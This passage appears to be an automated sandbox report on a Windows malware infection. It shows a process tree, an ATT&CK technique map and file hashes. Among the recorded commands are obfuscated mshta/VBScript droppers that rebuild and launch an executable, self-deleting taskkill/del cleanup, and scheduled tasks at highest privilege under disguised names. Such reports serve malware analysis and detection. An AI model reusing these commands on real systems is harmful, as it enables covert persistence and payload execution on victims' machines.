                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\8045799c-5cc9-4612-8162-c6b5fa9b8ebe\build3.exe"
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                              PID:5724
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\8045799c-5cc9-4612-8162-c6b5fa9b8ebe\build3.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\8045799c-5cc9-4612-8162-c6b5fa9b8ebe\build3.exe"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:6628
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:7064
                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                        PID:8056
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\81F9.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\81F9.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:5968
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8E9C.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\8E9C.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                          PID:7156
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im 8E9C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\8E9C.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:8992
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                taskkill /im 8E9C.exe /f
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                PID:5516
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                PID:4232
                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                            PID:6248
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A6C9.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\A6C9.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:1012
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT ( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\A6C9.exe"" > ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF """" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\A6C9.exe"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ) )
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:8428
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\A6C9.exe"> ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\A6C9.exe") do taskkill -iM "%~Nxq" -f
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:8800
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE
                                                                                                                                                                                                                                                                        ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:8920
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT ( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"" > ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF ""/PvqsV6~7fsyUR14GhQkS4jjgPQTPw"" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ) )
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:5036
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"> ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "/PvqsV6~7fsyUR14GhQkS4jjgPQTPw" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE") do taskkill -iM "%~Nxq" -f
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                  PID:8160
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" vBsCripT: ClOSe ( creAteObJecT ( "WscrIpT.sheLl" ). RUN ( "cmd /q /c ECho %tImE%4u> VDn3614.Q9 & ECho | SET /p = ""MZ"" > WSyZI.4 & coPY /b /y WSYZI.4 + 0CPM7.G + TY6DSS.SE + vDN3614.Q9 ..\UfTh.2~z & STaRt msiexec -y ..\UFTH.2~Z & deL /q * " , 0 , tRUe ) )
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:948
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /q /c ECho %tImE%4u> VDn3614.Q9 & ECho | SET /p = "MZ" > WSyZI.4 & coPY /b /y WSYZI.4 + 0CPM7.G+ TY6DSS.SE + vDN3614.Q9 ..\UfTh.2~z & STaRt msiexec -y ..\UFTH.2~Z & deL /q *
                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                      PID:8004
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" ECho "
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                          PID:4192
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>WSyZI.4"
                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                            PID:8068
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                            msiexec -y ..\UFTH.2~Z
                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                              PID:6112
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                        taskkill -iM "A6C9.exe" -f
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                        PID:9000
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\B38C.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\B38C.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:4484
                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:8584
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                      PID:8644
                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                      PID:8344
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                      PID:6796
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                        PID:5956
                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                      PID:8412
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                      PID:7916
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:4828
                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                        PID:8176
                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                        PID:6620
                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                        PID:4724
                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                        PID:6256
                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:8228
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:5824
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:5268
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:6848
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                          PID:6180
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                          schtasks.exe /create /tn "S8LGJghE7EKxPiR6DNQktZgV" /sc ONLOGON /tr "'C:\ProgramData\Application Data\S8LGJghE7EKxPiR6DNQktZgV.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                          PID:8000
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:6268
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:7904
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:8068
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                schtasks.exe /create /tn "NpQFFR5PLBhAmQZ0HxCbwNxm" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\de\NpQFFR5PLBhAmQZ0HxCbwNxm.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                PID:4480
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                schtasks.exe /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core\SearchUI.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                PID:4124
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\KBDMYAN\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                PID:4008
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:5056
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                  schtasks.exe /create /tn "OwrOZbTk9HrZsEFTj0c7paTs" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\Adobe Films\S8LGJghE7EKxPiR6DNQktZgV.exe\OwrOZbTk9HrZsEFTj0c7paTs.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                  PID:9040
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\regsvr32.exe
                                                                                                                                                                                                                                                                                                  regsvr32 /s C:\Users\Admin\AppData\Local\Temp\BD0F.dll
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:9136
                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:8472

                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1031

                                                                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1197

                                                                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                                                                    4
                                                                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1089

                                                                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                                                                    File Permissions Modification

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1222

                                                                                                                                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1197

                                                                                                                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1130

                                                                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1518

                                                                                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                                                                                    8
                                                                                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                                                                                    7
                                                                                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      17f6f3213a5a5d2fb1ef8793081c5ddd

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      4601bd223fd7c52b12bc186ec9a0eb94167aaebb

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      6987f229daf0e954b67d5dbf779150b3b5c8dc3e69f66fe7c41f875be7725994

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      b640e80f1aec1302ad95f88b3fa10d16df39f9ecf498eadcd602bbd945550c8843393ef6176a2fc3120cf3db487edd400f3a633ef944faae5abcef67637d7276

                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      17f6f3213a5a5d2fb1ef8793081c5ddd

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      4601bd223fd7c52b12bc186ec9a0eb94167aaebb

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      6987f229daf0e954b67d5dbf779150b3b5c8dc3e69f66fe7c41f875be7725994

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      b640e80f1aec1302ad95f88b3fa10d16df39f9ecf498eadcd602bbd945550c8843393ef6176a2fc3120cf3db487edd400f3a633ef944faae5abcef67637d7276

                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      07e143efd03815a3b8c8b90e7e5776f0

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      077314efef70cef8f43eeba7f1b8ba0e5e5dedc9

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      32967e652530e7ac72841886cb07badcced11e1e725e2e85e1ee8046c4fe2149

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      79ed77bbcac3f84d846b4b02e1a50a197d857d4b1d6abd84a45393bb3c262768ab6f3952733a1ae6010978ab598842d9b7ac4be5a5b23c374a3d4796c87a38d6

                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      07e143efd03815a3b8c8b90e7e5776f0

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      077314efef70cef8f43eeba7f1b8ba0e5e5dedc9

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      32967e652530e7ac72841886cb07badcced11e1e725e2e85e1ee8046c4fe2149

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      79ed77bbcac3f84d846b4b02e1a50a197d857d4b1d6abd84a45393bb3c262768ab6f3952733a1ae6010978ab598842d9b7ac4be5a5b23c374a3d4796c87a38d6

                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\inst3.exe
